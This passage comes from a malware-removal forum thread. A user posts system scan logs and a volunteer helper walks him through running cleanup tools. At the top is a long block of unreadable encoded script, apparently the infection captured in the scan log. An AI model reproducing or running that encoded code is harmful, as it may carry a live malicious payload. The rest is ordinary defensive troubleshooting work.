]~lqAZnC9*[+jyIPt2NfWH\ss\U2"SpNp76s~A}jwp[!D5Sy[qqZ,~i#A2l:tKI9]~|TpM}K0h}s06i3Mm"IU8Zofd&1cp`s&ij^&t(gst"41j.t*\jsst%t~}A2zK3BAK3qy}.w/JzRcpiohmT.AHy1o:DtKsF;]jxA}jxCt+\yj`oI"js0]rYtjs}UmULZ!90]jDHth\AIuLZ4!p2joIVn!^\?U%S f"Iif^rHT^xK`LyqC}aC"HM1 VPp tsr3sAHF^LP lIKV}2V.gtZt/gx9jpNI~ijSXj(5*FT^!IN4p}j5Mj NNKZ.rSqBs.o2Z jW*6iww?#]s1oA$j q.dXR\m^1`i2wn].T\t3xn?8B2:ftWCqo7p`1er3o~pis2tjwMiUjyK#27N3.g[ 1d9!Acp`s}jM9xF!I\}P4wK^BAm!VKeTqSIs,"Kiq7N!pMj(5*63^rIrO~jTIWt89Bm.w&}sI^8F~!CFT\CPzh?`dc\ymWijYG?q5fSz0Xr 9a\sT! ugEpTB~IuA;#ssVd gI1s*s\s^AijwA}ixAp`oA5&N\tTV~p`s$jio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}i2Oqb3{f}Gxq.a8x5y\sDN(j)04fbO\G/H;o0W81l^&"V8?l?[ l!lqqVd3V![!.H42AP}pByl 1^^Xl1epxyl!ok(PW+]y.T"Mj/}qN4[MjM8&xM[ lLNVs\(VA7C *Z}oqG|![4q!Y^^:lV89tXSh]k4/AqCo9T9w/j_97[MjL[Z0/F!93qA)Wq!9l[!.((j!dq#x4Up.\VZ/ qj94U}.Hs!k 8.B(x5yH^Y9p?0oFsD98U"pN_BNn?3aFj*x4 }-l+iK9ubkBCzEP!jE}f]KS9AWHGbdxMOh|:/g/o0W Fg*^f"V4UX?9*ZC F^S0V;N!#H4fA:t(x C gVmzXg5p9.CVsdoKKvIy.Z]Mj/t9t[!jM42BM9*N[!V74^A-l XZ}pqKFM9t(ujy}p(.Hr*08VhL5 w/4wNa8:"\[F~X8+gA|UAW\ pT}/t(p VT}#O9(j6(}x^!t#DN(ja(.iV![GHzo?X4.`V![ftXp?X4#i^ENG\Xo?3TFoYx4 I}NuB9|j3aF?l98U\\l+iK9ubkB_bdtZShSGba6hZ|WpZ|e+w!5yL1;x/g/U!gZ 1d} #S|92a6hZ|tp4wN9d{Bb#*Ep@#@&id'lcI!U`a_EPb+a~f+x7llr~!Bqbi@#@&i8@#@&7^mY^tvn#@#@&7`@#@&dN@#@&8@#@&1sK/nv#pa5wpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-09-08 to 2014-10-08  )))))))))))))))))))))))))))))))
.
.
2014-10-08 20:06 . 2014-10-08 20:06 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-10-08 19:55 . 2014-10-08 19:55 62576 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{94C65124-9164-4170-A2FC-63C1CD769A1F}\offreg.dll
2014-10-08 16:06 . 2014-10-08 16:06 -------- d-----w- C:\cc7da2abb943a08459f7361f5e
2014-10-08 12:58 . 2014-10-08 13:08 -------- d-----w- c:\program files\CCleaner
2014-10-08 12:56 . 2014-09-09 01:24 8806800 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{94C65124-9164-4170-A2FC-63C1CD769A1F}\mpengine.dll
2014-10-07 22:50 . 2010-08-30 13:34 536576 ----a-w- c:\windows\system32\sqlite3.dll
2014-10-07 22:49 . 2014-10-07 22:51 -------- d-----w- C:\AdwCleaner
2014-10-07 19:41 . 2014-10-08 19:19 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-07 19:40 . 2014-05-12 12:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-07 19:40 . 2014-05-12 12:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-07 19:40 . 2014-05-12 12:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-10-07 19:40 . 2014-10-07 19:40 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-10-07 19:40 . 2014-10-07 19:40 -------- d-----w- c:\programdata\Malwarebytes
2014-10-07 18:59 . 2014-10-07 18:59 -------- d-----w- c:\users\abaskins\AppData\Local\ESET
2014-10-07 18:08 . 2014-10-07 18:10 -------- d-----w- c:\windows\system32\webclient
2014-10-01 12:57 . 2014-09-25 01:40 519680 ----a-w- c:\windows\system32\qdvd.dll
2014-09-24 12:57 . 2014-09-09 21:47 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-12 00:41 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-12 00:41 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-12 00:40 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-12 00:40 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-12 00:40 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-12 00:40 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-26 13:07 . 2013-10-29 23:14 590536 ----a-w- c:\programdata\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
2014-09-24 13:55 . 2013-03-11 19:14 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-24 13:55 . 2013-03-11 19:14 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-15 14:06 . 2013-10-29 18:00 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-08-27 13:45 . 2014-07-08 15:27 163504 ----a-w- c:\programdata\Microsoft\Windows\Sqm\Manifest\Sqm10145.bin
2014-08-23 01:46 . 2014-08-27 18:01 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-23 00:42 . 2014-08-27 18:02 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-08-12 15:35 . 2013-11-19 17:39 42784 ----a-w- c:\windows\system32\drivers\avgtpx86.sys
2014-07-25 07:35 . 2014-07-25 07:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-17 13:16 . 2010-06-24 16:33 23264 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-07-14 01:42 . 2014-08-13 17:59 654336 ----a-w- c:\windows\system32\rpcrt4.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2013-10-30 00:22 222712 ----a-w- c:\users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2013-10-30 00:22 222712 ----a-w- c:\users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2013-10-30 00:22 222712 ----a-w- c:\users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CCleaner Monitoring"="c:\program files\CCleaner\CCleaner.exe" [2014-09-26 4811032]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cAudioFilterAgent"="c:\program files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe" [2011-12-15 520320]
"SmartAudio"="c:\program files\CONEXANT\SAII\SAIICpl.exe" [2011-06-24 310912]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2013-03-14 145904]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2013-03-14 181232]
"Persistence"="c:\windows\system32\igfxpers.exe" [2013-03-14 189936]
"DBRMTray"="c:\dell\DBRM\Reminder\DbrmTrayIcon.exe" [2011-03-08 227328]
"egui"="c:\program files\ESET\ESET NOD32 Antivirus\egui.exe" [2013-09-12 5110672]
"IAStorIcon"="c:\program files\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe" [2013-07-15 36352]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2014-08-21 959176]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"DBRMTray"="c:\dell\DBRM\Reminder\TrayApp.exe" [2010-02-04 7168]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\GoToAssist]
2013-10-30 16:07 309080 ----a-w- c:\program files\Citrix\GoToAssist\917\g2awinlogon.dll
.
R2 vToolbarUpdater18.1.9;vToolbarUpdater18.1.9;c:\program files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-08-18 108032]
R3 Intel® Capability Licensing Service TCP IP Interface;Intel® Capability Licensing Service TCP IP Interface;c:\program files\Intel\iCLS Client\SocketHeciServer.exe [2013-05-11 637912]
R3 netvsc;netvsc;c:\windows\system32\DRIVERS\netvsc60.sys [2010-11-20 126464]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2012-08-23 14848]
R3 SynthVid;SynthVid;c:\windows\system32\DRIVERS\VMBusVideoM.sys [2010-11-20 19456]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2012-08-23 49664]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2012-08-23 27136]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2013-10-29 1343400]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 51040]
S0 iaStorA;iaStorA;c:\windows\system32\DRIVERS\iaStorA.sys [2013-07-15 531816]
S0 iaStorF;iaStorF;c:\windows\system32\DRIVERS\iaStorF.sys [2013-07-15 25960]
S1 avgtp;avgtp;c:\windows\system32\drivers\avgtpx86.sys [2014-08-12 42784]
S1 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys [2013-09-17 188808]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys [2013-09-17 134248]
S2 ClickToRunSvc;Microsoft Office ClickToRun Service;c:\program files\Microsoft Office 15\ClientX86\OfficeClickToRun.exe [2014-08-12 1664176]
S2 CouponPrinterService;Coupon Printer Service;c:\program files\Coupons\CouponPrinterService.exe [2014-02-13 152560]
S2 DellDigitalDelivery;Dell Digital Delivery Service;c:\program files\Dell Digital Delivery\DeliveryService.exe [2014-04-10 202248]
S2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\ekrn.exe [2013-09-12 1337752]
S2 epfwwfpr;epfwwfpr;c:\windows\system32\DRIVERS\epfwwfpr.sys [2013-09-17 122376]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-07-15 14696]
S2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;c:\program files\Intel\iCLS Client\HeciServer.exe [2013-05-11 586240]
S2 jhi_service;Intel® Dynamic Application Loader Host Interface Service;c:\program files\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [2013-09-12 169432]
S2 MBAMScheduler;MBAMScheduler;c:\program files\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-05-12 1809720]
S2 MBAMService;MBAMService;c:\program files\Malwarebytes Anti-Malware\mbamservice.exe [2014-05-12 860472]
S2 PasswordBox;PasswordBox;c:\program files\PasswordBox\pbbtnService.exe [2014-05-14 67584]
S2 SAService;Conexant SmartAudio service;c:\windows\system32\SAsrv.exe [2010-11-19 446592]
S3 ICCS;Intel® Integrated Clock Controller Service - Intel® ICCS;c:\program files\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe [2012-04-24 169752]
S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys [2013-02-27 289792]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2014-05-12 23256]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-10-08 110296]
S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys [2014-05-12 51928]
S3 MEI;Intel® Management Engine Interface ;c:\windows\system32\DRIVERS\TeeDriver.sys [2013-09-12 85464]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt86win7.sys [2011-06-10 394856]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MBAMSWISSARMY
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-09-26 13:29 1096520 ----a-w- c:\program files\Google\Chrome\Application\37.0.2062.124\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-10 c:\windows\Tasks\0814tbUpdateInfo.job
- c:\programdata\Avg_Update_0814tb\0814tb_{A18B207A-001B-4807-9E21-92BFB36FCAC8}.exe [2014-08-26 13:50]
.
2014-10-08 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-03-11 13:55]
.
2014-10-08 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-11-19 13:47]
.
2014-08-28 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-11-19 13:47]
.
2014-08-27 c:\windows\Tasks\Norton Security Scan for abaskins.job
- c:\progra~1\NORTON~2\Engine\410~1.29\Nss.exe [2014-08-14 08:13]
.
.
------- Supplementary Scan -------
.
mStart Page = hxxp://search.coupons.com/
IE: E&xport to Microsoft Excel - c:\program files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\program files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
TCP: DhcpNameServer = 192.168.100.9 8.8.8.8
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
HKLM-Run-ShopAtHomeWatcher - c:\users\abaskins\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
HKLM-Run-ShopAtHomeUpdater - c:\users\abaskins\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-08  15:07:17
ComboFix-quarantined-files.txt  2014-10-08 20:07
.
Pre-Run: 155,133,661,184 bytes free
Post-Run: 174,413,336,576 bytes free
.
- - End Of File - - 865B1978ABF6CDB9640455131DEA3EE6
5C616939100B85E558DA92B899A0FC36
 
========= End of CMD: =========
 

 

Looking forward to your review and comments, Georgi!!!

 

Thanks so much!

Scott Stevenson



#6 stevesls

stevesls
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Alabama
  • Local time:12:04 PM

Posted 10 October 2014 - 03:21 PM

Hi Georgi,

 

Pleased to report that as of 3:20pm (roughly 6 hours since running the FRST process) I have not detected any unusual activity on the computer. Looking GREAT at this point, but will wait for your review before considering the system "cleansed of evil".   

 

 

Very encouraged,

Scott Stevenson



#7 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,285 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:04 PM

Posted 11 October 2014 - 09:05 AM

Hello Scott,

 

Good. The infection seems to be removed.

 

However if you don't mind, I want to make sure there is nothing lurking on the system so just in case I want you to go through these steps:

 

The most of them should take no more than 5 minutes each (but the time they take to complete can vary depending on the size of your hard and the speed of your computer).

 

 

STEP 1

 

 

Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer.
  • After the scan has finished click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

 

STEP 2

 

 

thisisujrt.gif  Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.

 

 

STEP 3

 

 

  • Please download RKill by Grinler from the link below and save it to your desktop.

    Rkill
  • Before we begin, you should disable your anti-malware softwares you have installed so they do not interfere RKill running as some anti-malware softwares detect RKill as malicious. Please refer to this page if you are not sure how.
  • Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
  • A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
  • If nothing happens or if the tool does not run, please let me know in your next reply.
  • A log pops up at the end of the run. This log file is located at C:\rkill.log.
  • Please post the log in your next reply.

 

 

STEP 4

 

 

  • Please download RogueKillerX64.exe and save to the desktop.
  • Close all windows and browsers
  • Right-click the program and select 'Run as Administrator'
  • Wait for the prescan to complete and then press the Scan button.
  • When done press the Report button.
  • Please copy and past the results in your next reply.

 

 

STEP 5
 

 

Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters.
     
  • Put a checkmark beside loaded modules.
    Sbf88.png
  • A reboot will be needed to apply the changes. Do it.
  • TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
  • Then click on Change parameters in TDSSKiller.
  • Check all boxes then click OK.
     
  • Click the Start Scan button.
     
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
     
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and past the results at pastebin.com and post the link to the log in your next reply.

 

 

STEP 6

 

 

Please download Malwarebytes Anti-Malware to your desktop.
 

  • Double-click mbam-setup-2.0.2.1012.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 7

 

 

1.Please download HitmanPro.

  • For 32-bit Operating System - dEMD6.gif.
  • This is the mirror - dEMD6.gif
  • For 64-bit Operating System - dEMD6.gif
  • This is the mirror - dEMD6.gif

2.Launch the program by double clicking on the 5vo5F.jpg icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3.Click on the next button. You must agree with the terms of EULA. (if asked)

4.Check the box beside "No, I only want to perform a one-time scan to check this computer".

5.Click on the next button.

6.The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7.When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!
 
8.Click on the next button.

9.Click on the "Save Log" button.

10.Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.

 

 

 

STEP 8

 

 

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

 

and then if there aren't any issues left I'll give you my final recommendations. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#8 stevesls

stevesls
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Alabama
  • Local time:12:04 PM

Posted 12 October 2014 - 07:20 AM

Hello Georgi!

 

Thank you so much for your reply! Yes, it does look very promising so far.  I agree that since the DLLHOST.EXE virus was so difficult (well, for me, ;-) ) to initially identify and remove, I want to run every tool you suggest to confirm that it is completely removed from the system.

 

As I am away from the computer involved for the weekend, I will not be able to resume working on it until Monday, but I wanted to let you know that I will be posting the results late Monday afternoon or early evening. 

 

I thank you SO MUCH for your  incredible responsiveness and depth of expertise.  I am very impressed and appreciative!  I see " a beer or two " coming your way via PayPal soon!

 

All the best!

Scott Stevenson



#9 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,285 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:04 PM

Posted 12 October 2014 - 07:35 AM

Thank you for letting me know Scott and have a nice weekend then. Will catch you tomorrow. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#10 stevesls

stevesls
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Alabama
  • Local time:12:04 PM

Posted 13 October 2014 - 11:02 AM

Hello Georgi!

I have finished the various scans you suggested, and have pasted the associated logs below for your review and comments.  All in all, it seems to be great.. but I will wait to see your thoughts. Here are the logs in the order of the applications run:

 

*******************  Step 1 - AdwCleaner *************************

# AdwCleaner v4.000 - Report created 13/10/2014 at 08:14:11
# DB v2014-10-12.3
# Updated 12/10/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (32 bits)
# Username : abaskins - ABASKINS
# Running from : C:\Users\abaskins\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17280

-\\ Google Chrome v37.0.2062.124

Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [5909 octets] - [07/10/2014 17:49:33]
AdwCleaner[R1].txt - [1249 octets] - [08/10/2014 15:40:35]
AdwCleaner[R2].txt - [984 octets] - [13/10/2014 08:12:35]
AdwCleaner[S0].txt - [5952 octets] - [07/10/2014 17:51:36]
AdwCleaner[S1].txt - [1318 octets] - [08/10/2014 15:41:30]
AdwCleaner[S2].txt - [967 octets] - [13/10/2014 08:14:11]

########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1026 octets] ##########

 

 

*******************  Step 2 - Junkware Removal Tool  *************************

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.2 (10.09.2014:1)
OS: Windows 7 Professional x86
Ran by abaskins on Mon 10/13/2014 at  8:21:13.71
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

~~~ Registry Values

~~~ Registry Keys

~~~ Files

~~~ Folders

~~~ Event Viewer Logs were cleared

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 10/13/2014 at  8:24:32.29
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

*******************  Step 3 - RKill  *************************

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 10/13/2014 08:28:55 AM in x86 mode.
Windows Version: Windows 7 Professional Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * No issues found.

Checking Windows Service Integrity:

 * No issues found.

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * HOSTS file entries found:

  127.0.0.1       localhost

Program finished at: 10/13/2014 08:29:34 AM
Execution time: 0 hours(s), 0 minute(s), and 38 seconds(s)

 

 

*******************  Step 4 - RogueKiller  *************************

 

RogueKiller V10.0.1.0 [Oct 10 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 32 bits version
Started in : Normal mode
User : abaskins [Administrator]
Mode : Delete -- Date : 10/13/2014  08:41:22

